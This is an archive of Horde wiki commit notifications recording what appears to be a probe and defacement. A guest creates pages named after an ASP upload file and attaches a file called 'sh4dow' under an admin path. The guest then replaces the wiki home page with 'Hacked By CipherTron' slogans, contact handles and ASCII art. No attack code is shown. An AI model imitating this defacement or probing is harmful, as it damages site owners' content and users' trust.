guest [138.68.93.153]  Mon, 11 Sep 2017 16:55:42 +0000

Created page: https://wiki.horde.org/rte/RTE_popup_file_atch.asp





From wikiguest at horde.org  Mon Sep 11 17:00:04 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Mon, 11 Sep 2017 17:00:04 +0000
Subject: [commits] [Wiki] created: smilarpages
Message-ID: <20170911170004.Horde.9y8dPGdi6cp9vD4wAjEV19q@wiki.horde.org>

guest [138.68.93.153]  Mon, 11 Sep 2017 17:00:04 +0000

Created page: https://wiki.horde.org/smilarpages





From jan at horde.org  Mon Sep 11 19:08:12 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 11 Sep 2017 19:08:12 +0000
Subject: [commits] [Wiki] deleted: rte/RTE_popup_file_atch.asp
Message-ID: <20170911190812.Horde.KhUVt2nDCzh1IRzHAnFUJVI@wiki.horde.org>

jan  Mon, 11 Sep 2017 19:08:12 +0000

Deleted page: rte/RTE_popup_file_atch.asp


From jan at horde.org  Mon Sep 11 19:08:17 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 11 Sep 2017 19:08:17 +0000
Subject: [commits] [Wiki] deleted: smilarpages
Message-ID: <20170911190817.Horde.Kpt866EbbKzuoEuTb2piCeA@wiki.horde.org>

jan  Mon, 11 Sep 2017 19:08:17 +0000

Deleted page: smilarpages


From wikiguest at horde.org  Mon Sep 11 23:24:04 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Mon, 11 Sep 2017 23:24:04 +0000
Subject: [commits] [Wiki] attachment: admin/RTE_popup_file_atch.asp, sh4dow
Message-ID: <20170911232404.Horde.JSOb7GYtFtP5KGn0nopUhli@wiki.horde.org>

guest [5.72.222.243]  Mon, 11 Sep 2017 23:24:04 +0000

New attachment "sh4dow" to page "admin/RTE_popup_file_atch.asp". View  
page: https://wiki.horde.org/admin/RTE_popup_file_atch.asp


From wikiguest at horde.org  Mon Sep 11 23:33:20 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Mon, 11 Sep 2017 23:33:20 +0000
Subject: [commits] [Wiki] changed: Wiki/Usage
Message-ID: <20170911233320.Horde.Y5pv71pJzhpHDpddWdEkdho@wiki.horde.org>

guest [5.72.222.243]  Mon, 11 Sep 2017 23:33:20 +0000

Modified page: https://wiki.horde.org/Wiki/Usage
New Revision:  2
Change log:  CipherTron

@@ -1,6 +1,3 @@
-Browsing the wiki is just like browsing the web.  You can edit any  
page by clicking on the edit button on any page.
-
-((Wiki/AddingPages)) - How to create new pages in the wiki.
-((Wiki/TextFormat))  - How to format wiki pages.
-((Wiki/SandBox))     - A page you can experiment on.
+#CipherTron

+Sh4dow


From wikiguest at horde.org  Mon Sep 11 23:35:58 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Mon, 11 Sep 2017 23:35:58 +0000
Subject: [commits] [Wiki] changed: Wiki/Home
Message-ID: <20170911233558.Horde.CQaHwQiw-Iq-v4c06M407ks@wiki.horde.org>

guest [5.72.222.243]  Mon, 11 Sep 2017 23:35:58 +0000

Modified page: https://wiki.horde.org/Wiki/Home
New Revision:  3
Change log:  CipherTron

@@ -1,21 +1,153 @@
-+ This is the Horde Wiki
-
-||~ Horde Project Home Page: http://www.horde.org/ ||
-
-++ Current Topics
-
-* ((FAQ|Frequently Asked Questions - FAQ))
-* ((HowTo|Horde How Tos))
-* ((Doc|Documentation))
-* ((Project|Projects to add or change large or small pieces of Horde))
-* ((Installations|Deployments, Providers, Distributions, and Hardware  
requirements))
-* ((ReleaseManagement|Release Management))
-* ((SecurityManagement|Managing Security Issues))
-* ((InterestingLinks|Interesting Links for Horde Developers))
-* ((UserInterface|User interface documentation, improvements, conventions))
-* ((MediaPress|Media & Press: Horde in the mainstream))
-
-
-++ Older Topics
-
-* ((Horde3Development|Horde 3 Development Guidelines))
+
+
+
+
+Hacked By CipherTron
+
+
+

#CipherTron

+

[----------------Owned By Sh4dow (Sh4dow at tatu.io)----------------]

+

We Are: Sh4dow - N37iD - All Freinds ....

+

We Are Anonymous - Underground World - In This Family Nobody not Alone

+

[---------------- Anonymous 2003 - 2017 ----------------]

+

https://twitter.com/TheCipherTron - https://telegram.me/CipherTron

+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+                                        `@.
+                                         +@;
+                               #;        #@@+                    `      '
+                             ;@@         @@@@@+,               .@       @,
+                          ,@@@@;         @@@@@@@@@+`       `@@@@+      ,@@@`
+                         #@@@@@.  `      @@@@@@@@@@@@;   .@@@@@@  .`   
  #@@@@@+
+                       `@@@@@@@` @@,    `@@@@@@@@@@@@@, `@@@@@@@ `@@;  
  @@@@@@@@@:                              +                             
   :
+                       `@@@@@@@  @@@    :@@@@@@@@@@@@@' +@@@@@@@  @@   
,@@@@@@@@@@;                     `       @                              
  +,                                   `:
+                       .@@@@@@@ `@@.    @@@@@@@@@@@@@@@ @@@@@@@@ `@#   
#@@@@@@@@@@@                    `#      :@;                             
  :@                                    @
+                       :@@@@@@@ `@+     @@@@@@@@@@@@@@@ @@@@@@@@ .@@  
`@@@@@@@@@@@@             ,`   `#@;      #@@@,                          
   '@@                           `       @;
+                       '@@@@@@#  @;     @@@@@@@@@@@@@@@,@@@@@@@+ :@:  
;@@@@@@@@@@@@.            ;@`#@@@@;     .@@@@@#`                `       
   @@@@:`                       :@#+     @@
+                       +@@@@@@+ `@:     @@@@@@@@@@@@@@@@@@@@@@@; #@`  
@@@@@@@@@@@@@,    #       #@@@@@@@;`@@` @@@@@@@@#             +@`       
   @@@@@@@`                    `@#      `@@@@.
+                       #@@@@@@; `@;    ,@@@@@@@@@@@@@@@@@@@@@@@, @@  
`@@@@@@@@@@@@@,   +'       @@@@@@@@; @@.`@@@@@@@@@@:        `;@@@       
   ,@@@@@@@@@':`               `@@:      +@@@@@@:
+                       @@@@@@@; `@;    '@@@@@@@@@@@@@@@@@@@@@@@.`@@  
#@@@@@@@@@@@@@:`#@@;      :@@@@@@@@@@@@ @@@@@@@@@@@@`      :@@@@; `  `  
   @@@@@@@@@@@@@,            `@@@@  +#+  @@@@@@@@@@:
+                       @@@@@@@: .@'    #@@@@@@@@@@@@@@@@@@@@@@@`,@@  
@@@@@@@@@@@@@@@@@@@:+     +@@@@@@@@@@@@`@@@@@@@@@@@@'     @@@@@@  @  
`#,  @@@@@@@@@@@@@#          .@@@@@@ `@@@  @@@@@@@@@@@@`
+                       @@@@@@@: .@;     
@@@@@@@@@@@@@@@@@@@@@@@@`+@#:@@@@@@@@@@@@@@@@@@@,''+@'  
@@@@@@@@@@@@@@@@@@@@@@@@@@#    `@@@@@@  '@@#  .@@@@@@@@@@@@@@           
@@@@@@#  #@  ,@@@@@@@@@@@@:
+                       @@@@@@@, ,@'    @@@@@@@@@@@@@@@@@@@@@@@@  
@@'#@@@@@@@@@@@@@@@@@@@, @@:  @@@@@@@@@@@@@@@@@@@@@@@@@@@    .@@@@@#   
,@@`  #@@@@@@@@@@@@@@,        `@@@@@@@  +'  +@@@@@@@@@@@@@
+                       @@@@@@@, :@#    @@@@@@@@@@@@@@@@@@@@@@@@  
@@:@@@@@@@@@@@@@@@@@@@@, #@   @@@@@@@@@@@@@@@@@@@@@@@@@@@    '@@@@@,   
,@#   @@@@@@@@@@@@@@@@        .@@@@@@@  #.  @@@@@@@@@@@@@@
+                       @@@@@@@, :@#   .@@@@@@@@@@@@@@@@@@@@@@@@  
@@.@@@@@@@@@@@@@@@@@@@@. +@  `@@@@@@@@@@@@@@@@@@@@@@@@@@@    #@@@@@.   
:@    @@@@@@@@@@@@@@@@        :@@@@@@@  @.  @@@@@@@@@@@@@@
+                       @@@@@@@, ;@#   :@@@@@@@@@@@@@@@@@@@@@@@@  
@@,@@@@@@@@@@@@@@@@@@@@. #@  .@@@@@@@@@@@@@@@@@@@@@@@@@@@    @@@@@@`   
,#   .@@@@@@@@@@@@@@@@        @@@@@@@#  @. .@@@@@@@@@@@@@@.
+                      `@@@@@@@, '@#    
'@@@@@@@@@@@@@@@@@@@@@@@@,@@;@@@@@@@@@@@@@@@@@@@@. @@   
,@@@@@@@@@@@@@@@@@@@@@@@@@@@    @@@@@@   ''   '@@@@@@@@@@@@@@@@         
@@@@@@@;  @` :@@@@@@@@@@@@@@'
+                      .@@@@@@@, +@#    
#@@@@@@@@@@@@@@@@@@@@@@@@'@@#@@@@@@@@@@@@@@@@@@@@. @@   
:@@@@@@@@@@@@@@@@@@@@@@@@@@#    @@@@@@   #;   #@@@@@@@@@@@@@@@@        
`@@@@@@@.  @` #@@@@@@@@@@@@@@#
+                      :@@@@@@@. +@#    
@@@@@@@@@@@@@@@@@@@@@@@@##@#@@@@@@@@@@@@@@@@@@@@@. @@   
'@@@@@@@@@@@@@@@@@;#@@@@@@@@    @@@@@@   @:   @@@@@@@@@@@@@@@@@        
'@@@@@@@`  @  @@@@@@@@@@@@@@@#
+                      '@@@@@@@` #@#    
@@@@@@@@@@@@@@@@@@@@@@@@#@@'@@@@@@@@@@@@@@@@@@@@@. @@   
@@@@@@@@@@@@@@@@@.' .@@@@@@@    @@@@@@  `@.   @@@@@@@@@@@@@@@@@        
#@@@@@@@` `@  @@@@@@@@@@@@@@@#
+                      +@@@@@@@` #@#    
@@@@@@@@@@@@@@@@@@@@@@@@+@@'@@@@@@@@@@@@@@@@@@@@@. @@   
@@@@@@@@@@@@@@@@@#`  :@@@@@@   .@@@@@#  .@,  .@@@@@@@@@@@@@@@@@:       
@@@@@@@@  ,@  @@@@@@@@@@@@@@@+
+                      #@@@@@@@  #@#    
@@@@@@@@@@@@@@@@@@@@@@@@#@@;@@@@@@@@@@@@@@@@@@@@@, @@   
@@@@@@@@@@@@@@@@@,    @@@@@@`  @@@@@@+  '@:  :@@@@@@@@@@@@@@@@@#       
@@@@@@@@  '@ ,@@@@@@@@@@@@@@@#
+                      @@@@@@@@  @@+    
@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@, @@  
`@@@@@@@@@@@@@@@@@'+   ;@@@@@` :@@@@@@+  @@+  ;@@@@@@@@@@@@@@@@@#       
@@@@@@@@  +# #@@@@@@@@@@@@@@@@
+                      @@@@@@@@  @@+    
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@, @@  
;@@@@@@@@@@@@@@@@@#    `@@@@@, +@@@@@@'  @@#  '@@@@@@@@@@@@@@@@@#       
@@@@@@@@  #+ @@@@@@@@@@@@@@@@@
+                      @@@@@@@@  @@+    
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,`@@  
@@@@@@@@@@@@@@@@@@#    .@@@@@+ +@@@@@@;  @@#  +@@@@@@@@@@@@@@@@@'      
`@@@@@@@@  @' @@@@@@@@@@@@@@@@@
+                      @@@@@@@@  @@+    
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:.@@  
@@@@@@@@@@@@@@@@@@@# .@`@@@@@@ +@@@@@@, `@@;  #@@@@@@@@@@@@@@@@@#      
'@@@@@@@@  @: @@@@@@@@@@@@@@@@@
+                      @@@@@@@@  @@+    
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:@@  
@@@@@@@@@@@@@@@@@@@@,#; @@@@@@ +@@@@@@. ,@@.  #@@@@@@@@@@@@@@@@@@      
@@@@@@@@#  @, @@@@@@@@@@@@@@@@@
+                     ,@@@@@@@@  @@#    
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@''@@  
@@@@@@@@@@@@@@@@@@@@+ . @@@@@@ '@@@@@@` #@@`  @@@@@@@@@@@@@@@@@@@      
@@@@@@@@+  @. @@@@@@@@@@@@@@@@@
+                     @@@@@@@@#  @@#    
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+@@@`@@@@@@@@@@@@@@@@@@@@@    
@@@@@, +@@@@@@  @@@   @@@@@@@@@@@@@@@@@@@     @@@@@@@@'  @`  
@@@@@@@@@@@@@@@@#
+                     @@@@@@@@+  @@@    
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@;@@@@@@@@@@@@@@@@@@@@@;`@@@@@'  +@@@@@@  @@@   @@@@@@@@@@@@@@@@@@@    `@@@@@@@@: `@  
`@@@@@@@@@@@@@@@@#
+                    .@@@@@@@@'  @@@    
'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+@@@@@@@@@@@@@@@@@@@@@@@@#;     @@@@@@@  @@#   '@@@@@@@@@@@@@@@@@@    .@@@@@@@@. ,@  
:@@@@@@@@@@@@@@@@+
+                    '@@@@@@@@;  @@@    
'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
      .@@@@@@@  @@'   ,@@@@@@@@@@@@@@@@@@    ,@@@@@@@@  #@  
'@@@@@@@@@@@@@@@@@
+                    #@@@@@@@@:  @@@    
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
      '@@@@@@#  @@:    @@@@@@@@@@@@@@@@@@`   :@@@@@@@@  @#  
+@@@@@@@@@@@@@@@@@
+                    @@@@@@@@@,  @@@    
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
      @@@@@@@+  @@,    #@@@@@@@@@@@@@@@@@    +@@@@@@@@  @+  
#@@@@@@@@@@@@@@@@@
+                    @@@@@@@@@,  @@@    
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:     @@@@@@@;  @@.    ;@@@@@@@@@@@@@@@@@    @@@@@@@@#  @'  
#@@@@@@@@@@@@@@@@@
+                    @@@@@@@@@@, @@@    
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#    .@@@@@@@` `@@      @@@@@@@@@@@@@@@@@    @@@@@@@@+ ,@:  
#@@@@@@@@@@@@@@@@@
+                     
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@     ;@@@@@@@  '@@      @@@@@@@@@@@@@@@@@   .@@@@@@@@+ +@`  
#@@@@@@@@@@@@@@@@#
+                    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
:@@@@@@@@@@@@@@@@@@@@@@@@@:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@      
'@@@@@@@  @@@      `@@@@@@@@@@@@@@@;   #@@@@@@@@' #@  #@@@@@@@@@@@@@@@@+
+                    
`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,`;@@@@@@@@@@@@@@@@@@@@@@@@@'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@     #@@@@@@@.`@@@`      @@@@@@@@@@@@@@@`   @@@@@@@@@; @@   
#@@@@@@@@@@@@@@@@;
+                   ;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
',@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@      
@@@@@@@@@@@@@,    ` ,@@@@@@@@@@@@@@    @@@@@@@@@@@@+  #@@@@@@@@@@@@@@@@.
+                   +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'  
#'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@      
@@@@@@@@@@@@@@@@@@@+`@@@@@@@@@@@@@@    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`
+                   #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,  
+@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@      
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                    
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:`@@@@@@@@@@@@@@@@@@@@@@@@@'`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,    
.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;   
+@@@@@@@@@@@@@@@@@@@@@@@.`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@     
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`   ;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                      `@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;   
;@@@@@@@@@@@@@@@@@@@@@@@ `@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@     
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                    ,:.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:   
;@@@@@@@@@@@@@@@@@@@@@@@ `@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@     
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'    +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                    @:,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:   
;@@@@@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#     
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`    `  +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                    @ ;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,   
:@@@@@@@@@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#    
.@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@         
;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+                    :##@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.   
`@@@@@@@@@@@@@@@@@@@@@@@ `@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`    
;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;         
#@@@@@@@@@@@@@@@@@@@@@@@'#@@@@
+                     ''@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.    
@@@@@@@@@@@@@@@@@@@@@@+  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@       
`+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`      # @@@@@@@@@@@@@@@@@@@@@@@@    . `
+                      :#@@@@@@@@@@@@@@@@@@@@@@@@@@@@.    
@@@@@@@@@@@@@@@@@@@@@@;  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`      
'`@@@@@@@@@@@@@@@@@@@@@,'@@@@@@@'      @ @@@@@@@@@@@@@@@@@@@@@@@:
+                       '@@@@@@@@@@@@@@@@@@@@@@@@@@@@`    
@@@@@@@@@#@@@@@@@@@@@@;  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@`     
;#.@@@@@@@@@@@@@@@@@@@@#   ;@@@@@@      @`@@@@@@@@@@@@@@@@@@@@@@@.,
+                       +@@@@@@@@@@@@@@@@@@@@@@@@@@@.     
@@@@@@@@@'@@@@@@@@@@  : `@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@      
.@`@@@@@@@@@@@@@@@@@@@@.     @@@@@       :@@@@@@@@@@@@@@@@@@@@@@@`;
+                       + at +@@@@@@@@@@@@@@@@@@@@@@@@@     
`@@@@@@@@@;#@@@@@@@@@+   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@      
. at .@@@@@@@@@@@@@@@@@@@# `    `@@@@`      :#+ @@@@@@@@@@@@@@@@@@@@ :
+                         '@@@@@@@@@@@@@@@@@@@@@@@@@     
`@@@@@@@@@::@@@@@@@@@@.  #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@       
;@@@@@@@@@@@@@@@@@@@@: `    .@@@@.          @@@@@@@@@@@@@@@@@@@@#.
+                         '@@@@@@@@@@@@@@@@@@@@@@@@@     
`@@@@@@@@@.`@@@@@@@@@    .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@       
;#@@@@@@@@@@@@@@@@@@@.: `   #@@@@.          @@@@@@@@@@@@@@@@@@@@@  ``
+                         ;@@@@@@@@@@@@@@@@@@@@@@@@@     @@@@@@@@@`  
#@@@@@@@@    `@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@         
@@@@@@@@@@@@@@@@@@@@ ;  .#@@@@;           @@@@@@@@@@@@@@@@@@@@#:'.
+                         :@@@@@@@@@@@@+@@@@@@@@@@@@     @@@@@@@@@.  
;@@@@@@@@`    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@        @  
@@@@@@@@@@@@@@@@@@@@@@@@.               @@@@@@@@@@#@@@@@@@@@@@;
+                         :@@@@@@@@@@@@;#@@@@@@@@@@@     @@@@@@@@@   
`@@@@@@@@.    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#        @  
@@@@@@@@@@@@@@@@@@@@@@@@                @@@@@@@@@@`@@@@@@@@@@@:
+                         ,@@@@@@@@@@@@,:@@@@@@@@@@#     @@@@@@@@@    
@@@@@@@@.    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+           
@@@@@@@@@@@@@@@@@@@@@@@@                @@@@@@@@@@ @@@@@@@@@@@;
+                         ,@@@@@@@@@@@@` @@@@@@@@@@+     @@@@@@@@#    
@@@@@@@@.    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'           
#@@@@@@@@@@@@@@@@@@@@@@@                @@@@@@@@@# :@@@@@@@@@@:
+                         .@@@@@@@@@@@@  @@@@@@@@@@'     '@@@@@@@@    
:@@@@@@@.    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:           
'@@@@@@@@@@@@@@@@@@@@@@@`               @@@@@@@@@:  @@@@@@@@@@@.
+                         .@@@@@@@@@@@@  @@@@@@@@@@;     .@@@@@@@@     
@@@@@@@`    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.           
:@@@@@@@@@@@@@@@@@@@@@@@                #@@@@@@@@`  :@@@@@@@@@@@
+                         .@@@@@@@@@@@@  @@@@@@@@@@:     `@@@@@@@@     
@@@@@@@     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@            
.@@@@@@@@@@@@@@@@@@@@@@@                +@@@@@@@@   `@@@@@@@@@@@`
+                         .@@@@@@@@@@@+  @@@@@@@@@@.      @@@@@@@@`    
@@@@@@@     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@            
`@@@@@@@@@@@@@@@@@@@@@@@                ;@@@@@@@@    @@@@@@@@@@@
+                         .@@@@@@@@@@@;  `@@@@@@@@@`      @@@@@@@@.    
+@@@@@@     @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@            
`@@@@@@@@@@@@@@@@@@@@@@@                ,@@@@@@@@`   ;@@@@@@@@@@
+                         :@@@@@@@@@@@.  `@@@@@@@@@       '@@@@@@@.    
:@@@@@@     @@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@             
@@@@@@@@@@@@@@@@@@@@@@@`               `@@@@@@@@,   `@@@@@@@@@@
+                         ;@@@@@@@@@@@    @@@@@@@@@       .@@@@@@@;    
.@@@@@;     @@@@@@@@@@@'@@@@@@@@@@@@@@@@@@@@@             
@@@@@@@@@@@@@@@@@@@@@@@                 @@@@@@@@'    @@@@@@@@@@
+                         ;@@@@@@@@@@@    @@@@@@@@@        @@@@@@@#    
.@@@@@,     @@@@@@@@@@@:@@@@@@@@@@@@@@@@@@@@+             
@@@@@@@@@@@@@@@@@@@@@@@                 @@@@@@@@@    '@@@@@@@@@
+                         ;@@@@@@@@@@@    .@@@@@@@#        +@@@@@@@.   
:@@@@@.     @@@@@@@@@@@,@@@@@@@@@@@@@@@@@@@@'             
+@@@@@@@@@@@@@@@@@@@@@@                 @@@@@@@@@     @@@@@@@@@
+                         #@@@@@@@@@@@     @@@@@@@+        `@@@@@@@'   
#@@@@@      @@@@@@@@@@@`+@@@@@@@@@@@@@@@@@@@,             
'@@@@@@@@@@@@@@@@@@@@@@                 @@@@@@@@@`    @@@@@@@@@.
+                         @@@@@@@@@@@;    `@@@@@@@#         @@@@@@@#   
@@@@@;      #@@@@@@@@@@ .@@@@@@@@@@@@@@@@@@@`             
:@@@@@@@@@@@@@@@@@@@@@@                 @@@@@@@@@`    '@@@@@@@@:
+                         @@@@@@@@@@@`    ,@@@@@@@+         +@@@@@@@   
#@@@@`      '@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@              
.@@@@@@@@@@,@@@@@@@@@@:                 #@@@@@@@@`    `@@@@@@@@'
+                         @@@@@@@@@@@     :@@@@@@@'         `@@@@@@@`  
:@@@#       :@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@              
`@@@@@@@@@@`@@@@@@@@@@@```              '@@@@@@@@      @@@@@@@@+
+                        `@@@@@@@@@@@     :@@@@@@@;           
@@@@@@@`:@@@@+        
,@@@@@@@@@@::+@@@@@@@@@@@@@@@@@@..,...........@@@@@@@@@@`#@@@@@@@@@@#   
               ;@@@@@@@@      :@@@@@@@+
+                        `@@@@@@@@@@@     :@@@@@@@:           
.@@@@@@+@@@@@;   
`,;;;;@@@@@@@@@#::;@@@@@@@@@@@@@@@@@#..............@@@@@@@@@@`:@@@@@@@@@@@,     
            ,@@@@@@@+       @@@@@@@'
+                        `@@@@@@@@@@;     ,@@@@@@@:            
@@@@@@@#@@@@@;;;;;;;;@@@@@@@@@#:::@@@@@@@@@@@@@@@@@',.............#@@@@@@@@@`  
@@@@@@@@@@@+               .@@@@@@@;       ;@@@@@@,
+                        ,@@@@@@@@@@.     ,@@@@@@@:            
@@@@@@@@@@@@@;;;;;;;;@@@@@@@@@@:::#@@@@@@@@@@@@@@@@,,.............'@@@@@@@@@.  
@@@@@@@@@@@@                @@@@@@@+        @@@@@@`
+                        ;@@@@@@@@@@      .@@@@@@@,            
@@@@@@@@@@@@#;;;;;;;;@@@@@@@@@@   ,@@@@@@@@@@@@@@@@;;;;::,.`     
``.@@@@@@@@@,`'@@@@@@@@@@@                @@@@@@@#         @@@@@#`
+                        +@@@@@@@@@@      .@@@@@@@.           
'@@@@@@@@@@@@#;;;;;;;;#@@@@@@@@@     
@@@@@@@@#@@@@@@@;;;;::::::,,,,,,@@@@@@@@@,``@@@@@@@@@@@                 
#@@@@@@@         @@@@@@'
+                        #@@@@@@@@@#      .@@@@@@@`         
`@@@@@@@@@@@@@@#;;;;:.  '@@@@@@@@@     
@@@@@@@@@@@@@@@;;;;;::::::,,,,,.@@@@@@@@@,``:@@@@@@@@@@                 
+@@@@@@@        :@@@@@@+
+                        @@@@@@@@@@;      .@@@@@@@         
`@@@@@@@@@@@@@@@,.       '@@@@@@@@@     
:@@@@@@@@@@@@@+;;;;;;:::::,,,,,.@@@@@@@@@;`  #@@@@@@@@@`                
'@@@@@@@.       ,@@@@@@
+                        #@@@@@@@@@.      +@@@@@@@         
@@@@@@@@@@@@@@@#         '@@@@@@@@@     
.@@@@@@@@@@@@@+';;;;;:::::,,,,,,@@@@@@@@@+    #@@@@@@@@`                
,@@@@@@@.        +@@@@@
+                        #@@@@@@@@@       @@@@@@@@        
`@@@@@@@@@@@@@@@+         ;@@@@@@@@@...``#@@@@@@@@@@@@';;;;;::::::,`    
  @@@@@@@@@+    `@@@@@@@@`               `@@@@@@@          #@@@@
+                        @@@@@@@@@@       @@@@@@@@       `@@@@#,   
#@@@@@@`       ``;@@@@@@@@@...``,@@@@@@@@@@@````                
@@@@@@@@@,     #@@@@@@@                 @@@@@@@.         ;@@@@
+                        @@@@@@@@@'       @@@@@@@#         `       
+@@@@@` .,,,,.,..;@@@@@@@@+..````@@@@@@@@@@'``````              
@@@@@@@@@      ;@@@@@@@                 @@@@@@@#';;;;::::#@@@@:``  ``..`
+                        @@@@@@@@@.      `@@@@@@@+                 
`@@#.,,,,,,,,,...:@@@@@@@@,...```#@@@@@@@@@``````               
@@@@@@@@@      `@@@@@@@            ```` `@@@@@@#';;;;;:::@@@@@+,.......`
+                        @@@@@@@@@       `@@@@@@@:                  
`,,,,,,,,,,,....,@@@@@@@@.....```@@@@@@@#`                     
'@@@@@@@#       @@@@@@@'    ``````````` @@@@@@@+';;;;::::#@@@@+,.......`
+                        @@@@@@@@@       @@@@@@@@,                
,,,,,,,,,,,,,,,,...@@@@@@@@...`````.@@@@@#                       
`@@@@@@@+       @@@@@@@+..`````````````,@@@@@@@'';;;;;:::+@@@@',.......`
+                        @@@@@@@@#      .@@@@@@@@;            
`,:::,,,,,,,,,,,,,.`   #@@@@@@@.       ,@@@@@#                        
@@@@@@@'.......#@@@@@@@``````````````@@@@@@@@''';;;;;:::;@@@@,,....``
+                        @@@@@@@@;      '@@@@@@@@'         
`::::::,,,,,,,,,,,,`      '@@@@@@@;       #@@@@@#           
``..,,,,,,,,,@@@@@@@@,......:@@@@@@@+``````       
@@@@@@@:;;'';;;;:::::#@@:.
+                       +@@@@@@@@       `@@@@@@@;     
